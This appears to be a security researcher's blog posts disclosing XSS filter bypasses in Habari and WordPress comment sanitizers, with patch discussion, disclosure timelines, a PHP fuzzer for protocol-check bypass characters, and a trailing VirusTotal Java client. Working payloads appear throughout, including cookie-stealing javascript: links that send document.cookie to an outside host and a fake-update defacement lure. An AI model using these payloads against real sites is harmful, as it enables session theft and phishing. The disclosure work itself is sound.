I want to share some security issues, I discovered about a month ago in Habari. All the vulnerabilities, I'm talking about, are actually fixed in Habari 0.7 RC3 after my collaboration with the Habari security team. This last version has been announced today, therefore I hardly encourage Habari users to update their blog.
I recommend you to read the whole blogpost (it's not so boring), but if you want to skip the discussion about the Habari issues and check a nice trick for the PHP parse_url() function in order to bypass a protocol check (HREF attribute), then take a look at the end of this blogpost.
1. Habari 0.6.6 (current stable version)
1.1 The protocol check for a HREF attribute (in the name, email and comment fields) can be bypassed.
Habari allows users to insert HTML code in the post's comments, but the "filtering" process is not implemented in the right way. So let's consider the A tag; it is possible to insert links just inserting:
<a href="http://ss.ss">click</a>
While using a non-valid protocol, the code is rightly modified in:
<a>click</a>
It seems that the filtering process works good... Actually we can bypass the filter by inserting an initial whitespace character:
<a href=" javascript:alert(0)">click</a>
The protocol check is completely bypassed with this simple trick, I noticed that Habari requires a moderation for each comment, but an "unexperienced" admin could allow a malicious one and then click on it. I found the issue in the inputfilter.php, where the url is considered as relative when using the whitespace. A particular regex is not matched and it allows the bypass. You can check the code to better understand what happens and which is its behaviour.
inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z][^:]*):(//)?'
It should be modified in the following one:
inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z ][^:]*):(//)?'
But it should be a very naive ( => bad) approach!! There are some other characters to bypass the filter, I'm going to talk below about them, be patient.. However it is not a good idea to mark a link as relative if it does not match the regex.
Note that the name (the user who comments) and the email fields are affected by the same issue.
So let's try to exploit this vulnerability with an effective attack. The email field is reported in the private section, so the blog administrator could directly click on it. An attacker is able to supply this vector in the email field:
<a href=" javascript:open(eval(String.fromCharCode(39,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99,111,111,107,105,101,61,39,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)))">CLICK ME!</a>
That's too simple! We could also modify the admin page content by using the DOM.
<a href=" javascript:eval(document.getElementById('site').innerHTML+=' Free sex? :P Go <a href=http://www.badsite.com>here</a>');">CLICK ME</a>
Cool screenshot:

1.2 Open tags are not automatically closed by the filter, so this can break the output.
The filter does not check whether an open tag becomes closed at the end of the comment. The content of a page could be hardly modified, I mean, just opening the A tag the filter does not close it and whenever a new user tries to insert a new comment, he will click on the injected link.
<a href=" javascript:alert(0)">click me
This is not a very important issue, because the administrator is able to check quickly the tag balance, when he manages the comments; he can solve it by editing the comment content too.
2. Habari 0.7-dp3
2.1 The protocol check for a HREF attribute (in the name and comment fields) can be bypassed.
The email field is filtered successfully, but the name and the comment fields behave as before.
2.2 Open tags are not automatically closed by the filter, so this can break the output.
Read the 1.2 for information.
2.3 IMG tags are not sanitized.
We have a lot of ways to exploit this vulnerability, the simplest one can be achieved by employing the following vector:
<img src="X" onerror="alert(1)">
Notice that no user interaction is needed in this case!! If the admin allows a comment then all the users, who will visit our blog, will be "attacked". Wow! :P
Fixes
The habari team decided to not solve the issues for Habari 0.6.6: inputfilter is drastically different than that one used in the 0.7 version. So they won't realize any fixes for the current stable version, but they hardly encourage everyone to upgrade to 0.7. So the (below mentioned) fixes are relative to the 0.7 version.
2.1
Let's concentrate on the parse_url and glue_url functions (inputfilter.php), they validate the URLs which are supplied in an attribute.
parse_url( $url ): it is based on the PHP's native parse_url(), but the preceding space actually "breaks" this last function! "This function parses a URL and returns an associative array containing any of the various components of the URL that are present", from the manual.
By supplying something like " javascript:blablabla", the returned array reports an empty 'scheme' ( == protocol ) and populates the slot 'path' with that string. It means that a lot of web applications, which does not correctly use that function, can be exploited... So even if the scheme is empty, we cannot immediately consider a URL as relative and safe.
The Habari security team proposed this fix: it employs the trim() function to remove all whitespaces from the URL ( -> naive approach ).
The filter can be bypassed again with HTML entities and the HEX encoding.
<a href="javascript:alert(0)">woot?!</a> // FF
<a href=" &xa0;javascript:alert(0)">ooo</a> // Opera 11
Each entity in the URL is validated by the strip_illegal_entities( $str ) function, that calls _validate_entity( $m ). Therefore the injected entities are converted in the correspondent characters and then submitted to the filtering process. For istance  is trivially "converted" to the BACKSPACE char (U+0008). There are a lot of other characters to bypass the trim(), because it strips very few chars at the beginning and end of the input string. Take a look at the following resources:
- bypassing-a-protocol-check-href-attribute (by me)
- location.protocol fuzzer (by Gareth Heyes)
- Web Application Obfuscation (book), chapter 2, URIs section.
Considering the previous concepts and the following two lines, the parsed URL is marked as relative. (code)
...
$r['is_pseudo'] = !in_array( $r['scheme'], array( 'http', 'https', '' ) );
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
...
glue_url( $parsed_url ): it restores a URL separated by a parse_url() call. Let's consider to have " javascript:blablabla" as input, the only one job that will be done is to append the 'path' slot to the final restored URL.
...
if ( !empty( $parsed_url['path'] ) ) {
$res .= $parsed_url['path'];
}
...
So how can we solve the issue?!
- To remove the & character -> bad, because & is useful in URLs.
- To mark as non-relative an URL that does not contain '.' or '/' characters -> bad, because these can be used in the javascript content instead of the protocol.
- To check whether the URL contains the ':' character -> Good way!! Notice that I do not mark as relative an URL that does contain the colon character.
I proposed the following patch in the inputfilter.parse_url() function:
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] && (strpos($r['path'], ":") == false) );
In this way the issue is definitely solved!
Ok, Someone could think to bypass again the filter by using : or : (IE8)... This is absolutely wrong becuase of the strip_illegal_entities( $str ) function.
Habari guys decided to not follow my suggestion, but they preferred to apply a regular expression to the URL before parsing it. They wanted to trim any unicode whitespace-like characters from the string (and not just the ASCII ones PHP's trim() adopts), check this. Let's investigate again:
<?php
$url = ' javas cript:alert(0)';
$r = parse_url( preg_replace('/^[\pZ\pC]+|[\pZ\pC]+$/u', '', $url) );
// i) the regex matches strings that start or finish with a whitespace
// ii) info about pC and pZ: http://webcache.googleusercontent.com/search?q=cache:mCQugTShrlMJ:nadeausoftware.com/articles/2007/9/php_tip_how_strip_punctuation_characters_web_page+nadeausoft+how+to+strip&cd=3&hl=it&ct=clnk&gl=it&source=www.google.it
// iii) which characters are considered for the matching? *Some* of them are reported in http://www.bogofilter.org/pipermail/bogofilter/2003-March/001889.html
print_r ($r);
?>
It looks to be a nice fix! Can we bypass the filter again? For sure, just supplying the whitespace in the middle of the URL!
<a href="javas cript:alert(0)">click</a>
Chrome and IE8 will definitely execute the alert! Actually I know three characters that can be used in the middle of the protocol in Chrome and IE 8, but of course they can change depending on the version of each browser.
1. U+0009 2. U+000A 3. U+000D
So Habari decided to follow a paranoid direction, that is the filter_var() function. FILTER_SANITIZE_URL filter removes all illegal URL characters from a string, cool! What about the IDNs? This stuff may cause some problems with any URLs, i.e. swedish ones. We should first encode the url content into punycode and then use that function, but this process can produce other issues... (The security team was aware of this point). They remarked that the ':' character is valid in a path and therefore my previous fix was not perfect.
Let's investigate by reading the RFC 3986, Relative Reference section:
A path segment that contains a colon character (e.g., "this:that") cannot be used as the first segment of a relative-path reference, as it would be mistaken for a scheme name. Such a segment must be preceded by a dot-segment (e.g., "./this:that") to make a relative-path reference.
So the best fix consists in checking whether a ':' char appears in the first segment of a relative-path reference. I proposed a fix that works in this direction and it's a very good solution in my opinion:
...
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
if ( strlen($parsed['path']) > 0 ) {
$s = substr($parsed['path'], 0, 1);
// relative-path reference -> !(network-path reference OR absolute-path reference)
if ( $s != '/' ) {
$n = explode('/', $parsed['path']);
// avoid something like this: javascript:alert(0)+[]+/sd/.source
if ( count($n) > 1 && strpos($n[0], ':') )
$r['is_relative'] = false;
// avoid something like this: javascript:alert(0)
else if ( count($n) == 1 && strpos($parsed['path'], ':') )
$r['is_relative'] = false;
}
}
if ( $r['is_pseudo'] ) {
...
At the end the Habari security team decided to fix in a cool way, that is by extracting the clean supplied scheme. Moreover the solution uses the PHP filter_var() SANITIZE_URL filter to get a true clean sanitized scheme, but employs the non-sanitized URL to parse the rest of the data in order to allow IDNs. So this is not the most elegant way, but probably the most clean.
I have also to report this, that is the fix to avoid HTML in the name field.
2.2
Actually there is no solution, with any luck it'll get fixed soon. However you can check the ticket here.
2.3
IMG tags were considered as special cases because of their "selfclosing" behaviour. First of all, the Habari team decided to remove any un-matched types of nodes (details), then they decided to use a whitelist for the attributes in the IMG tags (src and alt) and improve the conditional that determined if an attribute was valid (details).
As said before, all these vulnerabilities have been fixed and reported in the release notes and here. Some of the fixes have been done in the RC2, the URL filtering issue affects this last version, so you have to update to 0.7 RC3. The Habari security team took a lot of time to investigate and fix, but I understand that xss protection cannot be improved in just one day. :)They did not credit me, but it does not really matter.
Update: They credited and thanked me by updating the Habari 0.7 release announcement. Thank you guys! :)
However I want to thank Chris Meller for his patience and his very constructive collaboration.
------------------------------------------------------------------------------------------------------------------------------------------
Comments about the PHP parse_url() function
Finally I want to stress the fact that some character in an URL force the PHP's native parse_url() to output an interesting array: the scheme will be empty, while the path will contain the real protocol (i.e. javascript).
So let's consider the following PHP script:
<?php
$url = ' javascript:alert(0)';
$r = parse_url($url);
print_r ($r);
?>
Of course we have the following output:
| Input | Output |
| javascript:alert(0) | Array ( [scheme] => javascript [path] => alert(0) ) |
| [space]javascript:alert(0) | Array ( [path] => javascript:alert(0) ) |
| &#8;javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| javascript:alert(0) | Array ( [path] => javascript:alert(0) ) |
| [tab]javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| [newline]javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| java[space]script:alert(0) | Array ( [path] => java script:alert(0) ) |
Control characters are replaced by '_', while the spaces (U+0020) "force" the 'javascript' to appear as path, wherever they are supplied. Note that the php manual says: "This function doesn't work with relative URLs" and "This function is not meant to validate the given URL". So parse_url() is not bad to check a URL, but we need to use it in the right way!
Update: You can find a good fuzzer here (by Gareth Heyes), which inspects the location.protocol value. I realized that html_entity_decode is not completely good for our task; take a look at the comments for further very useful information.
Let's consider a XSS filter that tries to sanitize HTML code. It allows to insert links like the following:
<a href="http://www.x.x">click me</a>
It employs a regex to realize the protocol check (http / https / ftp are allowed), but we realize that this last one is not so smart. So we can bypass it by using html entities. It should allows us to to inject the following vector:
<a href=" javascript:alert(0)">click me</a>
By using an initial whitespace the filter becomes confused and allows it!
I'd like to know which characters I can use in that position in order to bypass similar stupid filters, that do not allow whitespaces. So let's fuzzing with a simple php code:
HTML Entities
<?php
for($i=0; $i<=50000 65535; $i++) {
$r = html_entity_decode('&#'.$i.';', ENT_QUOTES, 'UTF-8');
echo '<a href="'.$r.'javascript:alert(0)">click me</a> - '.$r.' - '.$i.' <br />';
}
?>
Results
Firefox 3.6.13 :  	  
Opera 11.00 : from 	 to and  
Chrome 8.0.552.237 : from  to  
IE 8 : from � to  
So the following vector could be used by an attacker, hoping that the unlucky user uses either Chrome or IE.
<a href="javascript:alert(1)">sad<a>
Let's try with hex encoding:Hex encoding
<?php
for($i=0; $i<=50000 65535; $i++) {
$h = '&#x'.dechex($i).';';
echo '<a href="'.$h.'javascript:alert(0)">click me</a> - '.$h.' - '.$i.' <br />';
}
?>
Results
Firefox 3.6.13 :  	 
 
  
Opera 11.00 : from 	 to 
 and  
Chrome 8.0.552.237 : from  to  
IE 8 : from  to  
Note that & should not be modified in & amp; by the filter.
Doesn't this kind of filters exist? I am sure you've already found something similar in your life :P
Hello guys! :)
A new version of Wordpress has been released few hours ago, as you can see from here. It fixes a critical vulnerability, so that the wordpress twitter profile called it "the most important security release of the year" (tweet).
[+] Plaintext advisory
I want to show you some details about this vulnerabilty (I discovered), actually it could be really dangerous to not update your wordpress blog. Other contributions come from Jon Cave (duck_), he is a Wordpress core contributor.
Analysis
I report some extract of the mail I sent to the Wordpress security team.
The default install of Wordpress 3.0.3 allows to insert comments like the following in order to publish a link to other sites:
<a href="http://site.it">click me</a>
The protocol check is done when the href attribute is written in lower case, so an attacker
should insert any kind of protocol into the attribute href with a vector like the following:
<a HREF="javascript:alert(0)">click me</a>
This is a very bad way to sanitize HTML! We can bypass the protocol filtering process by exploiting a case sensitive matching. It is also possible to steal cookies of a logged user in a trivial way:
<a HREF="javascript:open('http://example.com/?cookie=' + document.cookie)">jjj</a>
I can also realize a more effective attack, as inserting something like this:
<a HREF="javascript:eval(document.getElementById('site-title').innerHTML+=' IMPORTANT WORDPRESS UPDATE, go to badsite.com to download it!');">nice site</a>
An inexperienced admin could click on the link and see a fake update alert on its private section. That is very very bad! Take a look at the screenshot to have an idea..
.png)
Wordpress needs an acceptation for each comment, but a "stupid" administrator could
allow a kind of fake comment, which looks fine, or he could simply click on the injected link.
So why am I not using a simple obfuscation method?! Actually the base64 encoding is perfect in this case:
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">click here</a>
The issue was in the kses.php, that is the HTML sanitation library. The protocol check should be done in any case. Lower case or upper case, do not matter. You can find all further information about the fix here. As you can see the strtolower($attrname) function has been used to overcome the issue.
Disclosure timeline
20101219 Vendor contact
20101220 Vendor proposes a patch
20101220 The patch is ok in my opinion
20101220 Vendor takes time to fully audit and test kses.php
20101229 Wordpress 3.0.4 release
I wish you a happy new year :)
VirusTotal is a web service that performs url/file scan with some virus scanners. It provides some very simple public API, so that we can automate the file submission and report checking process. There was not a Java class to do this task, so that I decided to code it.
I'm working on the possibility to upload a file and scan it. I let you updated...
>> You can find the whole code here [JVirusTotal]. You can look at the following example for further information.
JVirusTotal vt = new JVirusTotal(your_API_key);
String url = "http://www.x.x";
// submit an URL
vt.submitScanURL(url);
// retrieve an URL scan report
vt.retrieveURLscan(url);
// retrieve a file scan report
vt.retrieveFilescan(getMD5Sum(new URL(url)));
The following class is used to get the MD5 hash of a file, by giving its URL.
import java.io.IOException;
import java.io.InputStream;
import java.math.BigInteger;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
public class md5 {
/**
* it calculates the md5sum
*
* @param url file url
* @return md5sum
*/
public static String getMD5Sum(URL url) {
MessageDigest digest = null;
try {
digest = MessageDigest.getInstance("MD5");
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
byte[] buffer = new byte[8192];
int read = 0;
String output = "";
InputStream is = null;
try {
is = url.openStream();
while( (read = is.read(buffer)) > 0) {
digest.update(buffer, 0, read);
}
byte[] md5sum = digest.digest();
BigInteger bigInt = new BigInteger(1, md5sum);
output = bigInt.toString(16);
}
catch(IOException e) {
e.printStackTrace();
} finally {
try {
is.close();
} catch(IOException e) {
e.printStackTrace();
}
}
return output;
}
public static void main (String[] s) throws MalformedURLException{
System.out.println(getMD5Sum(new URL("http://www.x.x")));
}
}
Via: Online Schools
Is this a dramatic situation?! People should use safer operating system and browsers to solve some problems... (no IE, no win please..)
--- --- --- --- --- --- ---
Take a look @ History of hacking for a nice "paper"..
It's a very interesting report, but from what he says, it seems that all hackers are criminals.. how sad..
